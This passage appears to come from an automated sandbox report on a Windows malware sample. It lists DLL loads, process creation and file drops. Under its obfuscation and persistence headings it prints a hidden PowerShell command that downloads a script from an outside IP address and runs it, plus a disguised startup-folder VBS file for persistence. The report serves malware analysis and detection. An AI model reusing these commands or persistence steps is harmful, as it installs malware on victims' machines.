              Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: twinui.dll
              Source: C:\Windows\explorer.exeSection loaded: pdh.dll
              Source: C:\Windows\explorer.exeSection loaded: applicationframe.dll
              Source: C:\Windows\explorer.exeSection loaded: stobject.dll
              Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dll
              Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dll
              Source: C:\Windows\explorer.exeSection loaded: rmclient.dll
              Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dll
              Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dll
              Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dll
              Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dll
              Source: C:\Windows\explorer.exeSection loaded: npsm.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.web.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dll
              Source: C:\Windows\explorer.exeSection loaded: mscms.dll
              Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dll
              Source: C:\Windows\explorer.exeSection loaded: tdh.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dll
              Source: C:\Windows\explorer.exeSection loaded: mfplat.dll
              Source: C:\Windows\explorer.exeSection loaded: rtworkq.dll
              Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dll
              Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
              Source: C:\Windows\explorer.exeSection loaded: structuredquery.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dll
              Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\explorer.exeSection loaded: icu.dll
              Source: C:\Windows\explorer.exeSection loaded: mswb7.dll
              Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dll
              Source: C:\Windows\explorer.exeSection loaded: uianimation.dll
              Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dll
              Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dll
              Source: C:\Windows\explorer.exeSection loaded: npmproxy.dll
              Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
              Source: C:\Windows\explorer.exeSection loaded: winnsi.dll
              Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
              Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\explorer.exeSection loaded: schannel.dll
              Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
              Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\explorer.exeSection loaded: ntasn1.dll
              Source: C:\Windows\explorer.exeSection loaded: ncrypt.dll
              Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
              Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
              Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
              Source: C:\Windows\explorer.exeSection loaded: gpapi.dll
              Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dll
              Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dll
              Source: C:\Windows\explorer.exeSection loaded: cryptngc.dll
              Source: C:\Windows\explorer.exeSection loaded: cflapi.dll
              Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\explorer.exeSection loaded: daxexec.dll
              Source: C:\Windows\explorer.exeSection loaded: container.dll
              Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 2568"
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: yjYJ8QncaF.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.pdb source: powershell.exe, 00000004.00000002.1927473773.0000021333708000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.pdbhP{ source: powershell.exe, 00000004.00000002.1927473773.0000021333708000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline"
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
              Source: yjYJ8QncaF.exeStatic PE information: section name: .code
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_000000014001BD3E push rbx; ret 0_2_000000014001BD3F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B8A458B push eax; iretd 3_2_00007FFD9B8A459D
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\tkaxwgf0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.dllJump to dropped file

              Boot Survival

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbsJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbsJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 16000
              Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49733
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
